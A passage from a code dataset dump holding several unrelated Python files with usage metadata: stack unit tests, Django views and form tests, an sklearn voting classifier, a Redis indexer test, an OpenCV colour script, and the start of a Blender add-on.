test_add_layer():\n s = stack.Stack()\n l = stack.Layer()\n\n s.append(l)\n\n assert s.head == l\n assert_layer_state(l, stack=s)\n\n\ndef test_add_multiple_layers():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n assert s.head == l3\n assert_layer_state(l1, next_layer=l2, stack=s)\n assert_layer_state(l2, next_layer=l3, prev_layer=l1, stack=s)\n assert_layer_state(l3, prev_layer=l2, stack=s)\n\n\ndef test_remove_layer_from_top():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n l3.remove()\n\n assert s.head == l2\n assert_layer_state(l1, next_layer=l2, stack=s)\n assert_layer_state(l2, prev_layer=l1, stack=s)\n assert_layer_state(l3)\n\n\ndef test_remove_layer_from_bottom():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n l1.remove()\n\n assert s.head == l3\n assert_layer_state(l1)\n assert_layer_state(l2, next_layer=l3, stack=s)\n assert_layer_state(l3, prev_layer=l2, stack=s)\n\n\ndef test_remove_layer_from_middle():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n\n l2.remove()\n\n assert s.head == l3\n assert_layer_state(l1, next_layer=l3, stack=s)\n assert_layer_state(l2)\n assert_layer_state(l3, prev_layer=l1, stack=s)\n\n\ndef test_remove_between():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n l4 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n s.append(l4)\n\n stack.remove_between(l1, l4)\n\n assert s.head == l4\n assert_layer_state(l1, next_layer=l4, stack=s)\n assert_layer_state(l4, prev_layer=l1, stack=s)\n\n\ndef test_iter():\n s = stack.Stack()\n\n l1 = stack.Layer()\n l2 = stack.Layer()\n l3 = stack.Layer()\n l4 = stack.Layer()\n\n s.append(l1)\n s.append(l2)\n s.append(l3)\n s.append(l4)\n\n assert list(s) == [l4, l3, l2, l1]\n", "sub_path": "tests/utils/data_structs/test_stack.py", "file_name": "test_stack.py", "file_ext": "py", "file_size_in_byte": 2618, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pycm.utils.data_structs.stack", "line_number": 10, "usage_type": "argument"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 16, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 16, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 21, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 21, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 22, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 22, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 31, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 31, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 33, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 33, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 34, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 34, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 35, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 35, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 48, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 48, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 50, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 50, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 51, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 51, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 52, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 52, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 67, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 67, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 69, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 69, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 70, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 70, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 71, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 71, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 86, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 86, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 88, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 88, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 89, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 89, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 90, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 90, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 105, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 105, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 107, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 107, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 108, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 108, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 109, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 109, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 110, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 110, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.remove_between", "line_number": 117, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 117, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Stack", "line_number": 125, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 125, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 127, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 127, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 128, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 128, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 129, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 129, "usage_type": "name"}, {"api_name": "pycm.utils.data_structs.stack.Layer", "line_number": 130, "usage_type": "call"}, {"api_name": "pycm.utils.data_structs.stack", "line_number": 130, "usage_type": "name"}]} +{"seq_id": "405050323", "text": "from django.shortcuts import render, redirect\nfrom django.http import HttpResponseRedirect\n\nfrom .models import KebutuhanMaterial, Proses, StasiunKerja\nfrom .forms import KebutuhanMaterialForm\nfrom produk.models import Varian\nfrom produk.models import Material\nfrom django.db.models import Count, F\n\n\ndef newMaterial(request):\n kebutuhanMaterial_form = KebutuhanMaterialForm(request.POST or None)\n\n # masukin data dari form ke database\n if request.method == 'POST':\n id = request.POST.get('id')\n proses = request.POST.get('proses')\n material = request.POST.get('material')\n\n proses_sk = Proses.objects.get(idProses=proses)\n p_sk = str(proses_sk.stasiunKerja)\n idm = Material.objects.get(id=material)\n mid = str(idm.idMaterial)\n var = str(idm.varian)\n varmat = Varian.objects.get(idVarian = var)\n idmaterial = Material.objects.filter(idMaterial=mid, varian = varmat).first()\n stasiunKerja = StasiunKerja.objects.get(idStasiunKerja=p_sk)\n\n KebutuhanMaterial.objects.create(id=id, stasiunKerja=stasiunKerja,material=idm, proses=proses_sk,)\n\n material = KebutuhanMaterial.objects.filter(stasiunKerja=stasiunKerja).filter(material__idMaterial=idmaterial, material__varian = varmat).first()\n km = material.jumlahMaterialPerCycleTime\n kumulatif = km+1\n\n KebutuhanMaterial.objects.filter(material__idMaterial=idmaterial, material__varian = varmat).update(jumlahMaterialPerCycleTime=kumulatif)\n next = request.POST.get('next', '/')\n return HttpResponseRedirect(next)\n\n context = {\n 'Judul': 'Tambah Kebutuhan Material',\n 'kebutuhanMaterial_form': kebutuhanMaterial_form,\n }\n return render(request, 'liniProduksi/newMaterial.html', context)\n\ndef deleteMaterial(request, delete_id):\n #cara delete\n KebutuhanMaterial.objects.filter(id=delete_id).delete()\n next = request.POST.get('next', '/')\n if request.method == 'GET':\n next = request.GET.get('next', '/')\n return HttpResponseRedirect(next)\n\ndef updateMaterial(request, update_id):\n #cara edit Produk\n kebutuhanMaterial_update = KebutuhanMaterial.objects.get(id=update_id)\n kebutuhanMaterial_form = KebutuhanMaterialForm(request.POST or None, instance=kebutuhanMaterial_update)\n\n if request.method == 'POST':\n proses = request.POST.get('proses')\n material = request.POST.get('material')\n\n proses_sk = Proses.objects.get(idProses=proses)\n p_sk = str(proses_sk.stasiunKerja)\n idm = Material.objects.get(id=material)\n stasiunKerja = StasiunKerja.objects.get(idStasiunKerja=p_sk)\n\n KebutuhanMaterial.objects.filter(id=update_id).update(stasiunKerja=stasiunKerja,material=idm, proses=proses_sk,)\n next = request.POST.get('next', '/')\n return HttpResponseRedirect(next)\n\n context = {\n 'Judul': 'Update Kebutuhan Material',\n 'kebutuhanMaterial_form': kebutuhanMaterial_form,\n }\n\n return render(request,'liniProduksi/newMaterial.html',context)", "sub_path": "liniProduksi/viewsMaterial.py", "file_name": "viewsMaterial.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "forms.KebutuhanMaterialForm", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Proses.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Proses.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Proses", "line_number": 20, "usage_type": "name"}, {"api_name": "produk.models.Material.objects.get", "line_number": 22, "usage_type": "call"}, {"api_name": "produk.models.Material.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "produk.models.Material", "line_number": 22, "usage_type": "name"}, {"api_name": "produk.models.Varian.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "produk.models.Varian.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "produk.models.Varian", "line_number": 25, "usage_type": "name"}, {"api_name": "produk.models.Material.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "produk.models.Material.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "produk.models.Material", "line_number": 26, "usage_type": "name"}, {"api_name": "models.StasiunKerja.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "models.StasiunKerja.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.StasiunKerja", "line_number": 27, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.create", "line_number": 29, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 29, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 31, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 35, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 47, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 51, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 55, "usage_type": "name"}, {"api_name": "forms.KebutuhanMaterialForm", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Proses.objects.get", "line_number": 62, "usage_type": "call"}, {"api_name": "models.Proses.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.Proses", "line_number": 62, "usage_type": "name"}, {"api_name": "produk.models.Material.objects.get", "line_number": 64, "usage_type": "call"}, {"api_name": "produk.models.Material.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "produk.models.Material", "line_number": 64, "usage_type": "name"}, {"api_name": "models.StasiunKerja.objects.get", "line_number": 65, "usage_type": "call"}, {"api_name": "models.StasiunKerja.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "models.StasiunKerja", "line_number": 65, "usage_type": "name"}, {"api_name": "models.KebutuhanMaterial.objects.filter", "line_number": 67, "usage_type": "call"}, {"api_name": "models.KebutuhanMaterial.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.KebutuhanMaterial", "line_number": 67, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 69, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "86169407", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 22 16:24:18 2018\n\n@author: Ayoub El khallioui\n\"\"\"\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\n\niris=load_iris()\nX=iris.data\ny=iris.target\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.33,random_state=40)\n\ndef proba_sample(pipeline,sample,X_train,y_train,X_test):\n pipeline.fit(X_train,y_train)\n proba=pipeline.predict_proba(X_test[sample].reshape(1,-1))\n return proba\n\ndef Voting(weights):\n pipeline_LR=Pipeline([('scaler',StandardScaler()),('clf',LogisticRegression(random_state=42))])\n pipeline_SVC=Pipeline([('scaler',StandardScaler()),('clf',SVC(random_state=42,probability=True))])\n pipeline_DT=Pipeline([('scaler',StandardScaler()),('clf',DecisionTreeClassifier(random_state=42))])\n predictions=[]\n for i in range(len(X_test)):\n proba_LR=proba_sample(pipeline_LR,i,X_train,y_train,X_test)\n proba_SCV=proba_sample(pipeline_SVC,i,X_train,y_train,X_test)\n proba_DT=proba_sample(pipeline_DT,i,X_train,y_train,X_test)\n liste_proba_clf=np.concatenate((proba_LR,proba_SCV,proba_DT),axis=0)\n class_label=np.argmax(np.average(liste_proba_clf,axis=0,weights=weights))\n predictions.append(class_label)\n return predictions\n\"\"\"\ny_pred=Voting(weights=(0.5,0.4,0.1))\nprint('accuracy_score={}'.format(np.sum(y_pred==y_test)/len(y_test)))\n\"\"\"\ndef find_optimum_weights():\n liste_W=np.arange(0,1.1,0.1)\n combinations=[(w_LR,w_SCV,w_DT) for w_LR in liste_W for w_SCV in liste_W for w_DT in liste_W]\n weights=list(filter(lambda x:x[0]+x[1]+x[2] <= 1 and x[0]+x[1]+x[2] > 0 ,combinations))\n accuracy_score=[]\n for combination in weights:\n y_pred=Voting(weights=combination)\n accuracy=np.sum(y_pred==y_test)/len(y_test)\n accuracy_score.append(accuracy)\n optimum_combination=weights[accuracy_score.index(max(accuracy_score))]\n return optimum_combination\n\nWeights=find_optimum_weights()\ny_pred=Voting(weights=Weights)\nprint('accuracy_score={}'.format(np.sum(y_pred==y_test)/len(y_test)))\n\n", "sub_path": "Classifier_Voting.py", "file_name": "Classifier_Voting.py", "file_ext": "py", "file_size_in_byte": 2329, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "170996531", "text": "import os\nimport random\nimport pytest\nimport numpy as np\n\nfrom google.protobuf.json_format import MessageToJson\nfrom jina.executors.indexers import BaseIndexer\nfrom jina.executors.metas import get_default_metas\nfrom jina.drivers.helper import array2pb\nfrom jina.proto import jina_pb2, uid\n\n\nfrom .. import RedisDBIndexer\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef metas(tmpdir):\n os.environ['TEST_WORKSPACE'] = str(tmpdir)\n metas = get_default_metas()\n metas['workspace'] = os.environ['TEST_WORKSPACE']\n yield metas\n del os.environ['TEST_WORKSPACE']\n\n\ndef random_docs(num_docs, chunks_per_doc=5, embed_dim=10, jitter=1):\n c_id = 3 * num_docs # avoid collision with docs\n for j in range(num_docs):\n d = jina_pb2.Document()\n d.tags['id'] = j\n d.text = b'hello world doc id %d' % j\n d.embedding.CopyFrom(array2pb(np.random.random([embed_dim + np.random.randint(0, jitter)])))\n d.id = uid.new_doc_id(d)\n yield d\n\n\ndef test_redis_db_indexer(metas):\n num_docs = 5\n docs = list(random_docs(num_docs=num_docs,\n chunks_per_doc=3))\n keys = [uid.id2hash(doc.id) for doc in docs]\n values = [doc.SerializeToString() for doc in docs]\n\n query_index = random.randint(0, num_docs - 1)\n query_id = docs[query_index].id\n query_key = uid.id2hash(query_id)\n query_text = docs[query_index].text\n\n with RedisDBIndexer(metas=metas) as idx:\n idx.add(keys=keys, values=values)\n\n with RedisDBIndexer(metas=metas) as redis_query:\n query_results = redis_query.query(key=query_key)\n for result in query_results:\n assert result is not None\n assert result['key'] == str(query_key).encode()\n d = jina_pb2.Document()\n d.ParseFromString(result['values'])\n assert d.text == query_text\n", "sub_path": "indexers/keyvalue/RedisDBIndexer/tests/test_redisdbindexer.py", "file_name": "test_redisdbindexer.py", "file_ext": "py", "file_size_in_byte": 1857, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "jina.executors.metas.get_default_metas", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 16, "usage_type": "call"}, {"api_name": "jina.proto.jina_pb2.Document", "line_number": 28, "usage_type": "call"}, {"api_name": "jina.proto.jina_pb2", "line_number": 28, "usage_type": "name"}, {"api_name": "jina.drivers.helper.array2pb", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "jina.proto.uid.new_doc_id", "line_number": 32, "usage_type": "call"}, {"api_name": "jina.proto.uid", "line_number": 32, "usage_type": "name"}, {"api_name": "jina.proto.uid.id2hash", "line_number": 40, "usage_type": "call"}, {"api_name": "jina.proto.uid", "line_number": 40, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "jina.proto.uid.id2hash", "line_number": 45, "usage_type": "call"}, {"api_name": "jina.proto.uid", "line_number": 45, "usage_type": "name"}, {"api_name": "jina.proto.jina_pb2.Document", "line_number": 56, "usage_type": "call"}, {"api_name": "jina.proto.jina_pb2", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "604067022", "text": "from django.test import TestCase, Client\nfrom django.contrib.auth.models import User\n\nimport datetime\nfrom django.utils.timezone import make_aware\n\nfrom mute.models import MuteEvent\nfrom mute.forms import InstantForm, MuteForm\n\nclass TestForms(TestCase):\n\n def setUp(self):\n self.u = User.objects.create_user( username='TestUser',\n password='testing',\n email='test@email.com')\n\n # Create nine existing mutes.\n for i in range(9):\n event_x = MuteEvent.objects.create(\n screen_name_muter = self.u,\n screen_name_mutee = 'jsamaudio',\n mute_on = make_aware(datetime.datetime(2020,i+1,4,2,2,2), timezone=None),\n mute_off = make_aware(datetime.datetime(2020,i+1,4,2,20,2), timezone=None),\n reoccuring = 'Not',\n past = False,\n )\n event_x.save()\n\n\n def test_instant_form(self):\n form = InstantForm(data = {\n 'screen_name_mutee' : ''\n })\n self.assertFalse(form.is_valid())\n form = InstantForm(data = {\n 'screen_name_mutee' : 'this is not a valid screen name to mute'\n })\n self.assertFalse(form.is_valid())\n form = InstantForm(data = {\n 'screen_name_mutee' : 'valid name'\n })\n self.assertTrue(form.is_valid())\n\n def test_mute_event_form(self):\n form = MuteForm(data = {\n 'screen_name_muter' : self.u.id,\n 'screen_name_mutee' : 'jsamaudio' ,\n 'mute_on' : '2018-08-09 01:01:01', # Values have no time zone as\n 'mute_off' : '2018-08-10 01:01:01', # the form requires naive data\n 'reoccuring' : 'Not',\n 'past' : False,\n })\n self.assertTrue(form.is_valid())\n\n form.save()\n events = MuteEvent.objects.all()\n event = events[len(events)-1]\n\n test_on = make_aware(datetime.datetime(2018,8,9,1,1,1), timezone=None)\n test_off = make_aware(datetime.datetime(2018,8,10,1,1,1), timezone=None)\n\n self.assertEqual('jsamaudio', event.screen_name_mutee)\n self.assertEqual(test_on, event.mute_on)\n self.assertEqual(test_off, event.mute_off)\n self.assertEqual('Not', event.reoccuring)\n self.assertEqual(False, event.past)\n self.assertEqual(10, len(events))\n\n # Test the fifteen minute difference on/off requirement.\n form = MuteForm(data = {\n 'screen_name_muter' : self.u.id,\n 'screen_name_mutee' : 'jsamaudio' ,\n 'mute_on' : '2018-08-09 01:01:01', # Values have no time zone as\n 'mute_off' : '2018-08-09 01:02:01', # the form requires naive data\n 'reoccuring' : 'Not',\n 'past' : False,\n })\n self.assertFalse(form.is_valid())\n event.delete()\n form = MuteForm(data = {\n 'screen_name_muter' : self.u.id,\n 'screen_name_mutee' : 'jsamaudio' ,\n 'mute_on' : '2018-08-09 01:01:01', # Values have no time zone as\n 'mute_off' : '2018-08-10 01:20:01', # the form requires naive data\n 'reoccuring' : 'Not',\n 'past' : False,\n })\n self.assertTrue(form.is_valid())\n", "sub_path": "mute/tests/test_forms.py", "file_name": "test_forms.py", "file_ext": "py", "file_size_in_byte": 3310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 10, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 13, "usage_type": "name"}, {"api_name": "mute.models.MuteEvent.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "mute.models.MuteEvent.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mute.models.MuteEvent", "line_number": 19, "usage_type": "name"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "call"}, {"api_name": "mute.forms.InstantForm", "line_number": 31, "usage_type": "call"}, {"api_name": "mute.forms.InstantForm", "line_number": 35, "usage_type": "call"}, {"api_name": "mute.forms.InstantForm", "line_number": 39, "usage_type": "call"}, {"api_name": "mute.forms.MuteForm", "line_number": 45, "usage_type": "call"}, {"api_name": "mute.models.MuteEvent.objects.all", "line_number": 56, "usage_type": "call"}, {"api_name": "mute.models.MuteEvent.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "mute.models.MuteEvent", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 59, "usage_type": "call"}, {"api_name": "django.utils.timezone.make_aware", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "call"}, {"api_name": "mute.forms.MuteForm", "line_number": 70, "usage_type": "call"}, {"api_name": "mute.forms.MuteForm", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "82012784", "text": "\r\nimport cv2\r\nimport numpy as np\r\nimport colorgram\r\n\r\nimg = cv2.imread('picture.jpg')\r\n\r\nprint(\"1) \\t Color Recognizer\")\r\nprint(\"2) \\t View Text of Picture\")\r\nprint(\"3) \\t Quit from program\")\r\ncho = int ( input(\"please enter your choice <1-3> : \") )\r\nprint(\" \")\r\n\r\nif cho == 3 :\r\n cv2.destroyAllWindows()\r\n \r\nif cho == 2 :\r\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n ret,threshold = cv2.threshold(gray,12,125,cv2.THRESH_BINARY)\r\n th = cv2.adaptiveThreshold(gray,125,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,115,1)\r\n \r\n cv2.imshow('page',img)\r\n cv2.imshow('paget',threshold)\r\n cv2.imshow('threshAdaptive',th)\r\n\r\nif cho == 1 :\r\n colors = colorgram.extract('picture.jpg', 4)\r\n\r\n # colorgram.extract returns Color objects, which let you access..\r\n # RGB, HSL, and what proportion of the image was that color.\r\n first_color = colors[0]\r\n rgb = first_color.rgb # e.g. (255, 151, 210)\r\n hsl = first_color.hsl # e.g. (230, 255, 203)\r\n proportion = first_color.proportion # e.g. 0.34\r\n\r\n # RGB and HSL are named tuples, so values can be accessed as properties.\r\n # These all work just as well:\r\n red = rgb[0]\r\n red = rgb.r\r\n saturation = hsl[1]\r\n saturation = hsl.s\r\n \r\n i=0;\r\n while(i<4):\r\n print(colors[i])\r\n i = i+1\r\n print(\" \")\r\n", "sub_path": "imageProcessing/ColorRecognizer.py", "file_name": "ColorRecognizer.py", "file_ext": "py", "file_size_in_byte": 1341, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "cv2.imread", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.adaptiveThreshold", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "colorgram.extract", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "344580224", "text": "import bpy\nimport os\n\nfrom .addon_prefs import get_addon_preferences\nfrom .functions import absolute_path\nfrom .global_variables import avoid_images\n\nclass AUTORELOAD_UL_uilist(bpy.types.UIList):\n\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, flt_flag) :\n row = layout.row(align = True)\n if item.name not 